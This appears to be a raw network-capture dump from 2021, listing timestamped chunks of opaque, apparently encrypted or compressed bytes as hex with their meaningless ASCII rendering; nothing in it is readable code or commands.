                                                                        2021-10-14 08:47:23 UTC25INData Raw: c9 68 d5 d6 da b2 ae 2f df 9f 5b 91 59 91 b0 c7 77 91 9f 99 ed cb 9b d9 82 ea b9 d8 66 4c c8 c6 76 6a 29 1f 47 41 c0 cb d6 96 02 c8 3d 73 cd 64 f4 61 12 ee 2b 40 73 39 99 0c ec fa 18 2a 3c 12 8a 30 0a 83 81 ec bd ee 39 31 37 32 ef f0 ee c2 4e 2a ae df a2 58 39 ff 81 6f 2c 28 5b fb 24 f7 69 d7 32 26 5f 62 90 16 01 05 36 53 c6 26 8d 0d da 3a 37 11 3b ea c3 3f 42 2b ae 1c c9 83 e2 35 44 76 5d 44 22 1b c2 bb a6 20 c7 70 ae ed 26 58 6c 35 aa 8a 08 8b f4 1c e0 96 a5 55 ae 1a 8b 33 a9 9c e3 cb d8 60 b2 70 03 7f 3e f0 7b a1 f9 17 4a 71 22 b2 71 23 83 a1 f6 7e eb 78 57 0e 9e d9 80 aa 4c 54 b2 ea fb 08 95 54 9e 2d cc 9f 22 1e dc e8 c9 9b f8 d3 27 d0 48 d9 b1 75 74 3e 75 b8 35 e9 0f 28 8c f5 23 82 30 e9 a7 fd f1 84 87 bb e9 bd 4d e1 7c 35 06 3f ea f5 d0 0b 72 06 d9
                                                                        Data Ascii: h/[YwfLvj)GA=sda+@s9*<09172N*X9o,([$i2&_b6S&:7;?B+5Dv]D" p&Xl5U3`p>{Jq"q#~xWLTT-"'Hut>u5(#0M|5?r
                                                                        2021-10-14 08:47:23 UTC27INData Raw: 22 02 4c 76 09 c1 f5 f8 d2 53 47 3f a7 33 aa 00 ec 76 3e e4 97 2f 97 d0 c5 a7 5f 6f 64 7a e2 35 68 10 e9 4f 97 d0 09 bf 75 d3 91 aa da 49 dd 8b 05 a3 ea 97 ed 31 39 af 88 7e db 5c 9c 4b 1f 12 b8 b2 63 f6 ad be 84 9e 87 c0 a0 db 1b 66 c5 f1 03 78 47 2d 57 11 16 65 f5 df 06 39 4d 3b e6 ae 00 be c7 21 1c 46 19 3b c2 f7 56 66 8c 63 a7 29 df 3a 1a 9a 06 81 dc b4 1a fd 08 19 45 6c d7 63 86 06 50 51 38 cf 83 e1 34 48 d8 33 be 3c 48 57 06 1f 74 d5 27 41 7b 3b e3 90 09 4a 09 5b 7c 7b a9 05 af 51 3f 75 34 ff fa 88 2c 60 7a e7 5e 5f 38 d4 8a a5 9a f3 2e 8b a0 7f 97 d4 db 71 85 cd ab 72 5e f9 8e 2d 7c 92 94 72 4c 54 2b 78 ce 9c 68 3e 15 30 55 ae 60 49 c4 98 30 f0 98 d5 be 92 66 17 47 da b9 17 a4 cb 8e 71 7d 41 18 f5 ad cc 6c c8 4a b5 4e c9 e2 59 cd 4c f2 0e fe 94 f3
                                                                        Data Ascii: "LvSG?3v>/_odz5hOuI19~\KcfxG-We9M;!F;Vfc):ElcPQ84H3<HWt'A{;J[|{Q?u4,`z^_8.qr^-|rLT+xh>0U`I0fGq}AlJNYL
                                                                        2021-10-14 08:47:23 UTC28INData Raw: 05 e7 8c a4 54 b4 1a 90 39 b2 da 85 ca f4 61 b0 7d 03 6c fc cb f1 bc d3 02 47 fc 34 a9 6e 3f 69 b4 ce 5d 59 73 46 14 50 46 b4 b5 52 46 81 d9 eb 13 80 70 ec 13 e0 92 32 33 4c bb c9 91 d6 a5 2a cf 76 dd 7c f8 4e 25 6a 8e d8 ef 32 32 89 d8 12 94 31 ef b5 58 a1 86 87 bc d2 ec 5e ea 6c 4b 79 9d fb f4 d4 07 e1 01 ca b7 52 0a da 88 3c c5 e4 33 2d 11 07 8f bd 0d 3a fc c1 11 25 13 88 53 7f fb 25 f6 08 fd 10 d3 fd a2 4a 83 61 96 54 c0 a4 d2 96 c4 8b 1f f8 25 72 24 78 2a fa dd f0 28 e6 d8 fc 43 d0 01 85 ef 8d 50 22 29 d3 e2 f8 98 eb 42 dc 8e 93 b4 c7 89 3d bf 34 71 49 85 4c d8 e7 5d 9b 96 87 84 5c 55 c9 4d 5e 3b f8 b8 15 dd 31 71 7a bd a2 5b af 53 a3 55 30 9e f2 6b 6a e2 be 23 3b e1 05 3a f5 f0 ce 83 08 c1 9f 51 65 93 2d 94 b6 4d 2f 0c 20 2d cf 2c 8d f1 86 06 54 5c
                                                                        Data Ascii: T9a}lG4n?i]YsFPFRFp23L*v|N%j221X^lKyR<3-:%S%JaT%r$x*(CP")B=4qIL]\UM^;1qz[SU0kj#;:Qe-M/ -,T\
                                                                        2021-10-14 08:47:23 UTC29INData Raw: a5 6e bb 49 d5 08 48 5f 67 a0 84 eb 4c 3e 74 2d b4 f5 8c 33 72 43 96 48 41 16 df 9f b4 84 f3 3b 95 99 0b 81 cb c5 4a 8f cb c7 5b 4f db 9f 09 13 b5 b5 32 1d 66 09 69 ed f3 40 3f e5 05 1d a4 e6 26 ed 93 87 ed 5f 7a 8c fd 4c 17 54 c3 b9 27 da f3 88 1d 54 50 1c e3 bc c8 e2 5f 65 c2 67 d6 e9 4a e2 7b 92 82 d5 9e f7 fe d0 0b 8b 1f 32 82 ac 35 6f c8 7d de 98 87 7d df 0f 25 95 a1 e2 67 9e e7 39 70 7f fe bf 03 c5 0d a1 cd a5 1f a5 bf 31 4d 31 d2 c8 a2 01 7e 9a 6d b0 3e a9 e8 0c 12 08 6a ec 56 e8 19 1d e9 96 02 90 a6 96 9e a3 4e 64 c6 6d 5a d7 0c 40 32 cb 79 d4 22 cc b9 70 3c cb 92 9f 97 45 9b 7f cd 4d 94 56 98 c1 ca 99 fb bb ca 6f cb 67 8d e6 d2 47 6c 12 45 24 6d 3e c8 fa 83 2a 6e 3c 73 c7 47 e5 6a 03 23 44 53 72 28 93 1f fb e5 35 39 27 10 9b 2b 15 42 7f ed 91 c6
                                                                        Data Ascii: nIH_gL>t-3rCHA;J[O2fi@?&_zLT'TP_egJ{25o}}%g9p1M1~m>jVNdmZ@2y"p<EMVogGlE$m>*n<sGj#DSr(59'+B
                                                                        2021-10-14 08:47:23 UTC31INData Raw: f9 02 7f 3b f0 cd ba 12 f7 d8 e7 61 66 10 8b f1 b1 73 35 01 71 96 ea 92 f4 43 dc 86 82 a2 d9 91 a5 f6 2d 87 52 08 33 e5 76 64 92 78 70 6a 4b 56 f2 58 5d 2a f1 b0 8b 24 30 48 e0 ae ae 4a b7 95 33 50 18 8e da 7f 60 40 a5 07 34 e9 14 37 fa 69 de 0e 27 c0 8c 5b 67 95 2a 9e 88 4b b3 1d 27 a7 7d 27 9a e4 ab 87 7d cc 30 a9 9f d5 7e 11 e9 f6 e5 96 17 32 a2 db 63 58 5f 84 39 12 4f 27 72 f3 dc d1 6b ee 81 2c f9 6e 0b be ce b6 64 9d 2b 4f 8d 3c 60 42 1c 6e 22 16 59 26 35 fa a3 e7 5a 9e f1 5a 1c 2b 17 c6 61 fa 90 1f b6 08 d0 bf 63 70 28 f0 b4 dd af 97 2d be 13 41 72 0f 5f f5 fb db 54 cd 3f ba 02 a4 9d fd 70 35 fc 1a 2f 4d d4 e2 02 4e 60 46 48 fc 21 71 0c e7 4f 97 d5 03 4f a2 29 a9 a7 f0 68 d3 a3 1b ab c2 01 e1 20 3c a4 58 6f fc 1e 8c 44 3d 04 91 f2 68 fb b6 a0 96 60
                                                                        Data Ascii: ;afs5qC-R3vdxpjKVX]*$0HJ3P`@47i'[g*K'}'}0~2cX_9O'rk,nd+O<`Bn"Y&5ZZ+acp(-Ar_T?p5/MN`FH!qOO)h <XoD=h`
                                                                        2021-10-14 08:47:23 UTC32INData Raw: b7 44 9e 14 b2 8a 74 1b 11 9e fe 52 e6 0d 18 fc a9 b7 a6 f3 8c 99 7d 4b 63 1e 40 71 c4 3d 22 65 c2 66 d7 00 ca 9f ac 0e c9 a0 3a 7d bd 6e b6 d7 43 b6 63 9d 8b 51 95 df bd f0 79 c0 68 76 ac c2 bb 3e 3d 4e 50 53 4a 35 05 7c 3c f0 3c 73 d4 56 e7 6a 3e f6 44 53 31 39 93 0e ed e9 1e 16 27 1a 8c d5 14 99 7d f5 9d e7 09 aa ca 33 c3 e2 a7 e6 55 2a bb b7 f6 4b c7 f4 a6 78 22 39 58 c5 cb f7 45 df 36 26 40 79 9a f3 00 38 2f 67 c9 f3 43 26 d6 57 6a 1b 13 f1 e8 3f 48 38 b7 33 c5 90 ac 35 55 6d 06 6c dc 0b f8 a2 a5 7f c6 78 bc 11 36 7f 71 22 d7 98 21 c6 ff 0f fe a4 85 5f b9 1a 92 32 48 b4 31 c7 f3 04 ed 7a 12 60 f0 d0 5c a9 f9 1f 5d 71 3b be 90 3f 51 a2 c2 79 fa 7b 5f e0 49 e6 8f ac 78 5d a5 ea e2 05 74 66 4c 2e f7 9e 33 13 ef 45 c8 b7 fc d4 28 e4 cd d0 80 75 65 25 71
                                                                        Data Ascii: DtR}Kc@q="ef:}nCcQyhv>=NPSJ5|<<sVj>DS19'}3U*Kx"9XE6&@y8/gC&Wj?H835Umlx6q"!_2H1z`\]q;?Qy{_Ix]tfL.3E(ue%q
                                                                        2021-10-14 08:47:23 UTC33INData Raw: 04 66 94 31 74 1e e7 53 9f f1 5a 95 31 34 fb 69 eb 9c 78 f4 12 5d 9a 19 6c 2e 35 af 16 b4 57 b7 09 02 4d 64 14 ca f2 ec 5f 4a 46 2c 02 87 bb 18 ef c8 b3 ed 90 37 5b c4 e2 bd 4f 60 46 67 ea bb d5 1b 3d 5b f4 e9 18 b1 a3 05 82 a5 a8 18 89 8b 80 a2 ea 97 55 bc 3f bc d0 da c3 84 88 64 37 07 b9 b2 34 4f 20 b8 b4 48 94 cf b1 fa 11 4e 58 f0 03 72 1c 20 46 0f 24 e3 f8 09 da 28 2d a1 f7 a1 22 a7 cf af a1 75 e3 2a cd ed b1 7e ab 53 a1 3e 03 5e 9b 16 2d 8b a6 9d 9e f9 0a 02 49 12 4b 75 97 09 74 41 b7 78 a9 1d 25 44 b7 1e b4 14 63 6d 2a 18 07 82 2e 61 7f c1 fa 99 c7 62 df 53 f2 cf 6e 1e 1a 5b e8 f8 15 90 e4 88 26 6c 44 a2 c2 59 29 ce 10 03 3a 7e 37 95 8e 37 9e 5a 6a 4a 8f cb c7 5b 58 e1 87 a3 cb 44 bc bc a0 c3 b7 70 d8 9a 71 37 6b b8 da 8e 7f fe ec 8a 86 e7 44 5e bf
                                                                        Data Ascii: f1tSZ14ix]l.5WMd_JF,7[O`Fg=[U?d74O HNXr F$(-"u*~S>^-IKutAx%Dcm*.abSn[&lDY):~77ZjJ[XDpq7kD^
                                                                        2021-10-14 08:47:23 UTC34INData Raw: 26 44 38 ac 15 39 91 d5 37 42 61 42 64 c5 e4 ef 82 8c 19 c4 5b 70 ed 4c 1a 7d 20 c1 b3 09 98 ce 0b f4 e5 8c 46 b5 56 9a 28 a7 a3 11 e1 91 6b ab 63 ec 6b c4 eb 03 df d2 04 5b 7a 2a a5 6e 36 6a 5e db 59 f8 6b 4a 1e 40 d3 75 b4 7e 4f da 88 eb 13 80 6d 7a 20 e0 9a 28 e5 f5 97 c0 99 fd 82 63 cf 7c ce b6 79 65 2d 70 71 ca c4 36 36 9b f7 08 f8 a9 e9 ad df c9 a4 86 bd cb 9a 07 e1 7a 5e 65 33 ea f7 d5 ef 6c 12 c8 a0 5f a8 c3 9f d1 c8 d9 3d 12 07 34 9b b8 16 0a f9 d2 66 34 1e 9e 09 e3 ea 39 f5 15 12 60 df ea 80 e1 f0 03 9d 72 db a4 c6 7d a0 94 0e f0 20 ee 7f 4f 2b fa dd 33 3f f7 dd f6 6d ab 26 84 e5 af 75 26 31 b6 bf eb 98 e1 48 ca 91 ed 99 d7 8e b9 00 2f c4 c7 19 3f f7 f5 59 80 80 e0 f6 55 41 eb 44 5a 2a f9 be 9c cc 20 75 f5 19 c1 66 a2 45 b8 5b c6 95 e3 6e 0f 24
                                                                        Data Ascii: &D897BaBd[pL} FV(kck[z*n6j^YkJ@u~Omz (c|ye-pq66z^e3l_=4f49`r} O+3?m&u&1H/?YUADZ* ufE[n$
                                                                        2021-10-14 08:47:23 UTC36INData Raw: 4b 08 d5 0f 0f 66 64 cf 79 97 0b 62 b7 38 e3 80 e0 5e 0e b7 2f bb 37 59 62 2a 16 69 2b 2e 4d 55 b9 98 db 49 d5 0d 58 54 15 b9 09 ca 4f 16 1b 3f 90 ee 8a 04 05 53 b5 54 77 b6 c7 9e b2 a8 fc 32 83 80 38 69 d5 f1 60 8f c6 c7 59 41 f3 70 2c 50 9d b6 31 3f 18 2a 78 c4 e1 23 3e e5 0b 13 8d fd 49 cc 8d 8c 19 4f 74 9d aa f5 16 54 c9 b7 09 b9 d8 81 03 a0 40 34 fd 95 48 6c e8 0a f1 6f da e3 51 de 9a d3 23 f9 a6 82 ff c3 2a 80 36 2d a2 a1 ea 78 fb 34 f1 82 e9 ee d5 7c 06 89 ad e8 7c a0 08 1e 4d 75 92 b5 6f c4 07 b8 ca bc 3b 8d aa 69 08 3d fa 9f a0 42 87 4d bc 81 3e af 87 47 12 08 60 cc 7e ef 08 28 f8 be 6d ef a7 96 94 64 4e 75 e8 5e 51 38 2b 03 44 c9 02 95 fe cb b7 ad 0d a1 99 41 88 41 b9 cf dd 68 b6 62 b0 ae c1 8a d8 bb 7a 6f cb 6b 75 f9 d8 61 6a 30 1b 55 93 3f e6
                                                                        Data Ascii: Kfdyb8^/7Yb*i+.MUIXTO?STw28i`YAp,P1?*x#>IOtT@4HloQ#*6-x4||Muo;i=BM>G`~(mdNu^Q8+DAAhbzokuaj0U?
                                                                        2021-10-14 08:47:23 UTC37INData Raw: c4 fc fe 1e 1f 1b a6 16 1c 15 d7 e6 34 61 1a ee ee 8a 67 80 61 9c 20 d1 a9 d5 2e db 97 0e f2 38 9b 3a 68 2a f0 dd 26 12 d2 db e7 6d ba 60 85 e5 a1 4c a5 2b d9 90 c2 26 eb 59 c5 e6 b8 b2 d6 84 b5 20 8d a9 5f 1f 41 9d e6 5d 95 ad 2d 97 54 47 c9 e9 5d 3b f4 c0 a2 db 31 7b 7d 86 9b 49 a3 43 cc 30 18 8f f6 43 56 43 af 29 00 ce 14 31 eb 8b e3 0f 27 cb 99 78 d1 9c 3c 9f de 3a b3 1d 29 2d 5b 2f 8d fd bf 2f 42 cc 3a c7 07 c5 75 03 fe da f5 84 17 34 d6 19 72 53 42 ba 3d 2f 4f 21 5b ef cd da 7b 90 bf 3e f4 75 00 82 df 34 66 9b 53 39 00 3b 64 6a 91 78 36 04 59 3b 35 fa a3 a0 71 9f f1 5a b8 12 93 d7 6b ed e4 6b a2 13 59 b8 f3 72 29 e5 90 72 a3 81 30 4d 38 4c 65 13 c5 cc cd c0 43 57 50 d6 1b b2 05 c4 e4 2d eb 80 16 ff c3 ca af 21 5a 4d 6e e9 33 4a 8a e5 5e 9e b4 78 b1
                                                                        Data Ascii: 4aga .8:h*&m`L+&Y _A]-TG];1{}IC0CVC)1'x<:)-[//B:u4rSB=/O![{>u4fS9;djx6Y;5qZkkYr)r0M8LeCWP-!ZMn3J^x
                                                                        2021-10-14 08:47:23 UTC38INData Raw: 7d df 7b 28 c1 a2 e8 72 90 4f 1d 61 58 b9 be 02 c5 0d 9a bc b7 38 8b 82 14 4d 3b f0 f0 9a 00 78 b8 44 9a 69 ac 87 72 3a b1 62 ff 78 c7 2b 1b f8 b4 45 f2 a4 96 92 55 66 75 e0 4b 32 fc 2b 2f 6f cc 51 87 fd cb b5 86 9c ce 98 47 aa 61 91 a1 d6 40 e6 62 98 c7 e8 ae d2 93 f8 00 f1 6c 53 ec d2 45 31 3b 04 5e 45 87 c8 fa 85 02 f9 3c 73 cd 4e b9 69 03 f0 6c 77 72 39 99 70 c1 e4 35 33 20 7d e5 2a 15 bf 10 92 90 e7 0b a1 33 19 8c fd de f9 d5 2b bf ce b1 4d cf 91 b0 60 2e 33 5d da 1d d9 69 dd 2b 07 42 5a ca 04 29 a6 2d 4c cd cb 88 30 d0 b6 91 0c 22 c1 d3 3b 5b 31 b2 10 cf bb d0 24 5c 7c 4a f6 cf 1c ff a8 88 1a e2 70 a4 e5 24 56 6c 25 ed a8 09 8b f4 23 fd 98 89 4e bc 32 2b 28 b6 b3 0c c2 e3 bd b0 73 03 62 f9 ea fe 09 e1 cb 43 76 1b 28 6f 3e 77 8d 4e ab f4 61 41 e0 5e
                                                                        Data Ascii: }{(rOaX8M;xDir:bx+EUfuK2+/oQGa@blSE1;^E<sNilwr9p53 }*3+M`.3]i+BZ)-L0";[1$\|Jp$Vl%#N2+(sbCv(o>wNaA^
                                                                        2021-10-14 08:47:23 UTC39INData Raw: 53 40 fd 3f 2c 4f 21 60 55 dc dc 60 f6 ad 5d f7 7f 00 c5 6c 36 66 9b 3e 5e 11 3d 71 4b 35 19 35 02 77 ea bf fb a9 c9 58 9b e0 55 96 5e 1f d5 6d 84 6a 0b a2 19 4c 95 4b 15 2a e3 be a3 53 81 3a 28 62 74 e2 19 c3 e4 e1 4e 68 51 2e b7 08 b8 08 c4 1a 2c eb 80 51 dc c3 ca af 47 48 c7 6f e3 3f 0d 8f e6 5e 92 e2 37 b1 a3 0f dd 89 ff 51 fa 28 10 a2 e0 f2 6d 21 36 bf 48 79 fc d3 8c 44 3d 20 b0 9a e2 fa bc bb f1 c4 95 cf a8 e2 a2 4e d1 f6 10 78 7f 37 4f 36 87 75 f8 03 bf a4 43 39 fd ce a4 ab c6 2b 3e e3 1c 2a cb fe 8a 5d c4 73 a2 34 14 2b dd 1e 05 e2 df b5 0f 96 80 09 4a 7b bc ed 97 03 72 58 33 e7 3e e2 25 42 a4 2a 94 29 53 68 3b 17 5c b6 2c 61 73 d4 69 91 49 d3 21 e3 7c 78 be 1a c5 5d 3a 5d b1 91 e4 83 01 55 43 b2 76 d0 3f c7 94 99 b8 f3 3b af ba 5c b5 d6 dd 64 84
                                                                        Data Ascii: S@?,O!`U`]l6f>^=qK55wXU^mjLK*S:(btNhQ.,QGHo?^7Q(m!6HyD= Nx7O6uC9+>*]s4+J{rX3>%B*)Sh;\,asiI!|x]:]UCv?;\d
                                                                        2021-10-14 08:47:23 UTC41INData Raw: ff 81 69 27 2e 86 de 2a fb 7a d8 21 3b 45 6e 88 f3 00 38 38 4a c3 f0 e6 22 d4 3e 0e 3e 13 fb c8 50 84 38 a4 09 d8 9c ea 30 55 7c 47 72 22 1b c2 a7 b6 4f 39 8f 5b f0 3e 40 78 20 d4 9c 12 75 ff 23 fa 8b a4 69 b5 1a 90 11 93 4a e2 35 e8 78 a6 7b 03 6f fe 1d 71 92 d0 13 42 74 33 b8 6b 21 6d 5e db 59 f8 58 43 26 fb 34 74 4a 54 6d a9 f9 da 10 8a 30 61 2c e0 ce 33 1b e5 a4 d1 16 d5 ff 2a ce 76 cc bc 55 84 25 6a 8f 57 ee 34 14 6d f0 0b 97 ad ef b5 f5 65 86 87 bd 5d e1 56 c1 a8 5a 7e 3f 76 f9 d9 31 c8 3e ca b7 cf ae d0 a3 9b c9 f5 3f a5 03 03 22 15 0d 3a fd 4e 1a 29 3e 08 44 e3 ea b4 e7 00 7e 68 42 ec 95 e4 9c 19 00 74 ce a3 db 4d 74 92 11 ff 2c b2 90 6f 35 f6 c8 0d a6 e0 c7 ea 74 f8 9d 83 fa ab 7b 2c b5 df 89 e5 87 f5 c5 c9 96 92 ac e2 12 b5 17 3d b4 4d 85 39 e2
                                                                        Data Ascii: i'.*z!;En88J">>P80U|Gr"O9[>@x u#iJ5x{oqBt3k!m^YXC&4tJTm0a,3*vU%jW4me]VZ~?v1>?":N)>D~hBtMt,o5t{,=M9
                                                                        2021-10-14 08:47:23 UTC42INData Raw: 76 f8 09 c2 3a 50 28 df c5 28 aa c0 ad 29 55 1c 2b de eb 91 73 95 fe 9d 3e 05 2c da 3f b1 80 dc bf 25 fc 32 ab 48 7d d3 64 86 10 74 58 29 d9 b7 75 27 44 b7 38 ae 2c 51 45 39 0d 4c 57 2d 61 75 aa ef 81 4e fd 7d 5a 7c 72 90 18 c0 4c 34 66 2b b8 79 88 2c 60 4c 86 47 4d 32 d5 92 9c 17 e3 3e 89 99 28 bf d4 dc 62 9d a0 11 79 c0 f8 8e 27 57 8a a6 3e 05 7b 03 00 cf 9c 62 2f e2 27 0c 87 f1 43 12 8c 5d cf d1 59 95 98 18 64 55 c9 a2 16 ac c9 9c 72 2d 40 18 ff 85 4c 6f e8 0c 81 c6 d7 e3 53 d4 47 c0 2d ef bd e6 ea eb 3b 9a 3a 27 c5 1c 15 79 dd 52 e3 80 86 77 fd eb 01 94 ab f9 61 d7 85 1e 61 54 b9 1c 01 c5 01 dd 4a b5 38 87 b9 10 5c 1b eb 8a 88 10 78 b2 49 dd 9f ae 87 7e 37 25 65 d9 6f c3 23 11 81 c2 6d aa a6 e7 e8 7d 42 74 f3 5e 4c d3 45 5c 64 cb 73 f6 7c c8 b3 a8 4a
                                                                        Data Ascii: v:P(()U+s>,?%2H}dtX)u'D8,QE9LW-auN}Z|rL4f+y,`LGM2>(by'W>{b/'C]YdUr-@LoSG-;:'yRwaaTJ8\xI~7%eo#m}Bt^LE\ds|J
                                                                        2021-10-14 08:47:23 UTC43INData Raw: 82 a2 dc f4 45 e1 6b 50 63 c1 eb d3 cb 29 1f c1 35 48 4d bb c1 83 3e c3 ed c1 38 29 06 00 42 46 3a fd d0 34 20 1e 9e 4e cb 9e 29 e1 14 49 10 de ea 80 e1 9a 72 96 72 c0 a3 db 16 16 95 22 e5 35 c0 a9 68 2a f0 5b 9c 3a e6 d9 f4 6e db 10 96 ef a5 75 29 36 c4 68 eb b4 e2 61 06 89 82 b3 c9 90 a0 02 2c ba 55 06 36 03 e7 71 9c 94 89 bd fc 40 e1 5d 4e 3e e1 a5 8b d0 31 60 71 b2 50 4b 8f 06 a3 54 30 d5 f2 6b 6a 05 a2 2f 28 ea 1e ce 1e 1b f4 f0 d8 3e e0 af 89 61 2f 67 5f a5 4a e0 d2 fa 37 d2 72 04 71 f5 bd 33 76 56 c2 3b b1 f7 07 0d 09 79 e8 cd 6c 87 8d ac 82 6c 4a d2 e0 d9 8c ae d0 c9 7b ff 94 35 eb 70 f8 ab ca 31 4d c4 32 49 13 31 60 53 17 65 3c fc 70 a9 33 d1 e3 d0 40 8d fb 50 af 30 05 2b 6a c7 8e 03 cd 60 5c 90 69 58 af e0 b8 ca cc 21 3b 22 08 40 7f 0a c9 e4 e6
                                                                        Data Ascii: EkPc)5HM>8)BF:4 N)Irr"5h*[:nu)6ha,U6q@]N>1`qPKT0kj/(>a/g_J7rq3vV;yllJ{5p1M2I1`Se<p3@P0+j`\iX!;"@
                                                                        2021-10-14 08:47:23 UTC45INData Raw: ad c6 73 f2 22 55 66 d6 e9 71 57 67 d2 09 d6 ba f7 ff c9 02 b5 3a 2d a0 91 08 7e c8 27 de 3b 86 7d df 54 90 97 a1 ee 5c 9c f6 1f 6b 76 3a 9c 02 cf 68 1e eb b4 32 8a c5 9d 4c 3b f0 8c ac 39 79 b3 43 b2 2c a3 af da 13 08 6a f2 77 c7 50 1b f8 b8 7e ae b8 8c bc c6 42 75 ea 69 cc c5 2a 29 4d ef 79 de f4 e3 39 af 25 c6 8b 44 93 47 e5 ca dc 68 bd 0e 59 c1 c0 80 c1 9e ca cd cb 6d 53 f7 d8 02 a8 38 04 52 45 a2 ca fa 89 39 dd 2d 74 ef 78 e6 6a 05 e7 40 47 5a ab 90 1f fd f3 b8 3e 27 12 9a 3f 01 a1 57 4e 91 e7 0b dd 21 32 ef e5 f1 f6 55 2a b5 d7 bb 5b c1 d6 9c 61 2e 33 7c b1 1d d8 6b dd 27 3b 46 59 08 0c 01 1e 42 c0 ca d8 86 09 80 38 26 1c 00 f2 d3 39 60 05 a5 03 cd 81 f0 41 47 6d 42 77 f4 4c ee ae 88 21 cc 79 8c d2 36 53 77 31 cf ed 18 8b fe 14 dc 9a 8f 46 b3 0c b2
                                                                        Data Ascii: s"UfqWg:-~';}T\kv:h2L;9yC,jwP~Bui*)My9%DGhYmS8RE9-txj@GZ>'?WN!2U*[a.3|k';FYB8&9`AGmBwL!y6Sw1F
                                                                        2021-10-14 08:47:23 UTC46INData Raw: 8d 3b 88 a7 63 12 1c 2d 05 7d 2b e2 4a 96 0b 48 df 22 be 2e d5 4d 8c f9 f2 cd 96 05 23 b9 e3 61 5b 57 95 a4 25 67 b9 70 51 cb f2 55 ff 85 35 9b cf 07 aa ec 24 6f 8c 24 36 b1 3a 60 48 0e 6e 20 11 62 bd 0c fb a9 cf 5a 8a e0 43 24 29 16 c4 62 fa 90 64 12 12 5d 9a 70 7b 38 e8 90 57 a0 81 3c 4d b0 4c 65 13 d7 1a f6 d5 bd 50 3f bd 33 2e 02 ec 7a 40 59 87 3e 4b d7 34 a4 58 9e 4d 0e da dc 62 03 e7 4f 93 e2 87 b2 a3 03 ed 17 d9 58 d8 8b 8d a2 ea 97 ed 31 3d 9d fe 6e d4 58 e2 f6 36 06 b3 9a f5 fb bc bb 8d 4e 85 ca b1 dc 02 5d c4 db 40 63 42 31 53 84 1f 79 e9 02 c1 27 2d 8b f6 a1 22 86 ed 30 1d 44 11 45 7f ec 80 7f f7 60 a2 3e 1e 3e c2 06 23 0f 6b a2 38 ed 22 9f 4a 7d d9 64 99 12 7c 61 f1 cf 89 e4 4a 52 b6 2f b5 37 53 7b 3d c8 67 c0 3e 74 64 ad 6d 27 7b 60 7a 79 7e
                                                                        Data Ascii: ;c-}+JH".M#a[W%gpQU5$o$6:`Hn bZC$)bd]p{8W<MLeP?3.z@Y>K4XMbOX1=nX6N]@cB1Sy'-"0DE`>>#k8"J}d|aJR/7S{=g>tdm'{`zy~
                                                                        2021-10-14 08:47:23 UTC47INData Raw: 3b 93 19 94 23 35 39 2d cc 95 0e 3d 82 7f ed 9b ea 29 8a 34 32 e5 31 d9 d7 7f 2b a3 c4 bd 4a c7 f8 ad 7d 0c 39 5e c9 35 f6 68 dd 21 1a 40 6d cf 0d 0f 0e 2d 4c ca c3 bc 22 d4 64 26 1a 13 a5 c2 3f 59 4b 1e 03 c7 9a f3 33 2b 5f 43 6c d8 32 f9 ac 8e 34 ee 37 a7 ef 31 7b 65 22 c5 9f 66 4d fe 0f fe 57 82 63 9d 2d 9a 28 bc b9 35 f2 f4 6b a9 a5 12 6c 96 d1 71 be d7 2c 46 73 33 af 46 79 7e a0 dc 5d e3 71 46 18 27 0c 8b b5 58 99 a7 cf c2 24 8a 67 6a 21 c8 aa 33 1b fe 65 c9 9d d4 fe 36 cf 7c ca aa 73 65 39 48 8f c5 f2 23 34 9c f0 0b a7 31 f5 e1 d5 a8 9c 87 bd c0 fc 7f e2 7a 06 7e 3f ea a1 c3 11 7c 4d 70 b7 53 a2 c1 85 51 fa f4 3f 3d 2d 08 00 92 0b 12 b4 d1 1c 32 36 86 46 e3 ec 47 27 1e 61 0b 00 e4 af c5 b4 61 9c 78 dd 81 fc 06 e8 9e d0 f4 35 96 3f 68 2a fe ff 37 38
                                                                        Data Ascii: ;#59-=)421+J}9^5h!@m-L"d&?YK3+_Cl2471{e"fMWc-(5klq,Fs3Fy~]qF'X$gj!3e6|se9H#41z~?|MpSQ?=-26FG'aax5?h*78
                                                                        2021-10-14 08:47:23 UTC48INData Raw: b5 5f 6d d4 ec 8d 33 1e 07 b6 a8 69 fb bd b1 9e 95 95 c5 45 cb 00 54 d1 f0 02 72 54 3e 44 69 99 76 f7 13 d0 2a 43 22 c7 a4 28 88 c5 21 16 3c 1c 2a dc 9e 3a 75 83 78 b1 3a 1a 37 e4 ac 2d 81 d6 9d b9 fa 0a 0e 62 59 d3 75 9d 08 7f 61 16 cf 89 e8 33 ba b6 28 97 8d 41 6e 2c 36 50 d5 2f 6b 5d 8a e3 90 43 c3 f7 5a 1c 54 bb 18 c4 66 39 5d 8f 93 e4 8f 04 4e 52 b5 54 77 ab c7 9e be 82 ca 8c 80 88 29 9a fc 6e 61 97 cc b4 d5 5f f9 84 25 13 27 b5 32 1d 18 ac 79 ce 96 7f 51 6d 0e 0c 8c 9e c0 c5 92 8d f4 47 70 21 91 66 10 27 4d a9 05 bf d0 e6 a8 5f 41 12 9a 2a cd 6c e2 1d 81 ee d7 e3 53 a8 ed d3 0f f4 8d f0 d7 76 29 9a 3c 5e 2e bc 14 73 df 52 43 81 86 77 ba fb 01 94 ab ff 1b 30 f7 1f 6b 31 18 9c 02 cf 14 b8 fb be 10 47 aa 30 47 18 fa 9f a0 01 78 b2 43 b2 c0 ae 91 8a 13
                                                                        Data Ascii: _m3iETrT>Div*C"(!<*:ux:7-bYua3(An,6P/k]CZTf9]NRTw)na_%'2yQmGp!f'M_A*lSv)<^.sRCw0k1G0GxC
                                                                        2021-10-14 08:47:23 UTC50INData Raw: 11 1c e0 93 76 98 fe f9 3d 42 7b ca aa 74 69 2d 7c 8b 47 d7 23 34 9c 52 03 83 25 c1 64 d4 a6 8c 9d ae c4 e7 5e e4 6c a4 7f 13 e9 e8 d0 14 6d 2f cf ad ad a9 e7 81 04 cb de 9e 3e 11 37 86 90 0d 3c ea 5f 1b 34 1e 9f 48 eb fc 2d 6d 21 61 01 df 48 82 e0 8a 75 88 65 5c 86 c4 06 e9 87 0a e5 37 fe 1b f5 3b fe ff 83 3a e6 d2 f6 6f d2 91 a9 c0 ac 72 b9 01 c8 96 ea 92 3b 66 cf 89 83 9b c2 8e b3 02 04 9f 5e 19 35 84 d9 5d 91 84 fe aa 54 41 e0 a9 56 38 fe db 8a da 31 6a 51 ae ae 4a b8 75 b1 50 44 8f f2 6b 3e 40
                                                                        Data Ascii: v=B{ti-|G#4R%d^lm/>7<_4H-m!aHue\7;:or;f^5]TAV81jQJuPDk>@
